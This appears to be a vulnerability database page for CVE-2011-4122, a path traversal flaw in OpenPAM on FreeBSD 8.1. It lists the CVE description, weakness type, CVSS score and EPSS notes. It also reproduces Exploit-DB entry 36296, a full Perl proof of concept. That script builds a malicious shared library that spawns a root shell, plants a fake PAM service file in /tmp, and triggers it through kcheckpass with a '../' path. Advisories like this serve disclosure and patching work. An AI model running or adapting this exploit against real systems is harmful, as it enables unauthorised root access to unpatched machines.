CVE-2011-4122
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Directory traversal vulnerability in openpam_configure.c in OpenPAM before r478 on FreeBSD 8.1 allows local users to load arbitrary DSOs and gain privileges via a .. (dot dot) in the service_name argument to the pam_start function, as demonstrated by a .. in the -c option to kcheckpass.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.9 | AV:L/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 36296
Publication date : 2011-11-08 23h00 +00:00
Author : IKCE
EDB Verified : Yes
source: https://www.securityfocus.com/bid/50607/info
OpenPAM is prone to a local privilege-escalation vulnerability.
Local attackers may exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
#!/usr/bin/perl
# kcheckpass invoking pam_start() with user provided
# service argument, what a bad idea. OpenPAM accepts that.
# Maybe this pam_start() vulnerability is exploitable via
# other vectors as well.
# Vuln tested on a FreeBSD 8.1. It does not affect
# Linux PAM, as it is checking for / character
# (C) 2011 by some dude, meant as a PoC! Only use on your own
# machine and on your own risk!!!
#
# This commit is likely to fix the bug:
# http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c
#
my $kcheckpass = "/usr/local/kde4/lib/kde4/libexec/kcheckpass";
# build suid shell
open(O,">/tmp/slam.c") or die $!;
print O<<EOC;
#include <stdio.h>
#include <unistd.h>
void __attribute__((constructor)) init()
{
char *a[] = {"/bin/sh", NULL};
setuid(0);
execve(*a, a, NULL);
}
EOC
close(O);
# build fake pam module
system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o");
# build fake PAM service file
open(O,">/tmp/pamslam") or die $!;
print O<<EOP;
auth sufficient /tmp/slam.so
EOP
close(O);
print "We need more Elchsalami! Happy birthday dude!\n";
exec("$kcheckpass -c ../../../tmp/pamslam -m classic");
Products Mentioned
Configuraton 0
Freebsd>>Freebsd >> Version 8.1
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
- Freebsd>>Freebsd >> Version 8.1 (Open CPE detail)
